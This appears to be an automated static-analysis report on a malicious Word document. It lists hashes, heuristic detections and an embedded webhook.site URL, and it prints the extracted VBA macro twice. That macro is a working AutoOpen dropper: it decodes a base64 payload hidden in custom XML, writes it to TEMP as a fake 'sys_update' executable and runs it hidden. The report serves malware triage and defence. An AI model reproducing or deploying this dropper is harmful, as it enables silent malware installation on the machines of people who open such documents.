Malicious Office (OOXML) / .DOCX — malware analysis report

Static analysis result for SHA-256 b83ab0be6521421d…

MALICIOUS

Office (OOXML) / .DOCX

86.1 KB Created: 2013-12-23 23:15:00 UTC Authoring application: Microsoft Macintosh Word 14.0000 First seen: 2026-06-21
MD5: 56438db81a13d38b4fffb57fc848ff10 SHA-1: cf2099567cc48841d64c024d5f26dab7969a3395 SHA-256: b83ab0be6521421dd0ae1f231b0393b7678bd12cf14faad64a568cfd1cf52b6c
240 Risk Score

Heuristics 9

  • VBA project inside OOXML medium 6 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        ' 5. Execute
    Dim shell As Object
    Set shell = CreateObject("WScript.Shell")
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        Dim shell As Object
    Set shell = CreateObject("WScript.Shell")
    shell.Run exePath, 0, False ' 0 = Hidden, False = Don't wait
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Dim xmlNode As Object
    Set xmlDoc = CreateObject("MSXML2.DOMDocument")
    Set xmlNode = xmlDoc.createElement("b64")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
    On Error Resume Next
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        ' 2. Prepare paths
    tempPath = Environ("TEMP")
    ' Randomize filename for uniqueness
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://webhook.site/a72d8905-b15f-4e95-9a8f-5e4bb7dc9b3d In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/mac/office/2008/mainIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/windows/2004/02/mit/task^In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2720 bytes
SHA-256: 6e5367f46c72c13005207f1dc5da0661fe98fe75e869567e5b84ea9259f67c14
Preview script
First 1,000 lines of the extracted script
Sub AutoOpen()
    On Error Resume Next
    Dim xmlPart As Object
    Dim base64String As String
    Dim tempPath As String
    Dim exePath As String
    Dim binaryData() As Byte
    Dim fNum As Integer
    
    ' 1. Locate the payload in CustomXMLParts
    ' We search for the <payload> tag
    For Each xmlPart In ActiveDocument.CustomXMLParts
        If xmlPart.DocumentElement.BaseName = "payload" Then
            base64String = xmlPart.DocumentElement.Text
            Exit For
        End If
    Next xmlPart

    If base64String = "" Then Exit Sub

    ' 2. Prepare paths
    tempPath = Environ("TEMP")
    ' Randomize filename for uniqueness
    exePath = tempPath & "\sys_update_" & Int((9999 - 1000 + 1) * Rnd + 1000) & ".exe"

    ' 3. Decode Base64 (using MSXML2.DOMDocument for decoding)
    Dim xmlDoc As Object
    Dim xmlNode As Object
    Set xmlDoc = CreateObject("MSXML2.DOMDocument")
    Set xmlNode = xmlDoc.createElement("b64")
    xmlNode.DataType = "bin.base64"
    xmlNode.Text = base64String
    binaryData = xmlNode.nodeTypedValue

    ' 4. Write to disk
    fNum = FreeFile
    Open exePath For Binary Access Write As #fNum
    Put #fNum, , binaryData
    Close #fNum

    ' 5. Execute
    Dim shell As Object
    Set shell = CreateObject("WScript.Shell")
    shell.Run exePath, 0, False ' 0 = Hidden, False = Don't wait

End Sub

Sub AutoOpen()
    On Error Resume Next
    Dim xmlPart As Object
    Dim base64String As String
    Dim tempPath As String
    Dim exePath As String
    Dim binaryData() As Byte
    Dim fNum As Integer
    
    ' 1. Locate the payload in CustomXMLParts
    ' We search for the <payload> tag
    For Each xmlPart In ActiveDocument.CustomXMLParts
        If xmlPart.DocumentElement.BaseName = "payload" Then
            base64String = xmlPart.DocumentElement.Text
            Exit For
        End If
    Next xmlPart

    If base64String = "" Then Exit Sub

    ' 2. Prepare paths
    tempPath = Environ("TEMP")
    ' Randomize filename for uniqueness
    exePath = tempPath & "\sys_update_" & Int((9999 - 1000 + 1) * Rnd + 1000) & ".exe"

    ' 3. Decode Base64 (using MSXML2.DOMDocument for decoding)
    Dim xmlDoc As Object
    Dim xmlNode As Object
    Set xmlDoc = CreateObject("MSXML2.DOMDocument")
    Set xmlNode = xmlDoc.createElement("b64")
    xmlNode.DataType = "bin.base64"
    xmlNode.Text = base64String
    binaryData = xmlNode.nodeTypedValue

    ' 4. Write to disk
    fNum = FreeFile
    Open exePath For Binary Access Write As #fNum
    Put #fNum, , binaryData
    Close #fNum

    ' 5. Execute
    Dim shell As Object
    Set shell = CreateObject("WScript.Shell")
    shell.Run exePath, 0, False ' 0 = Hidden, False = Don't wait

End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 17408 bytes
SHA-256: 7a76c878bc07c25938f3ca7c9f29af5086c6e10d5487603f8a3fcd5dc11d3b25
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.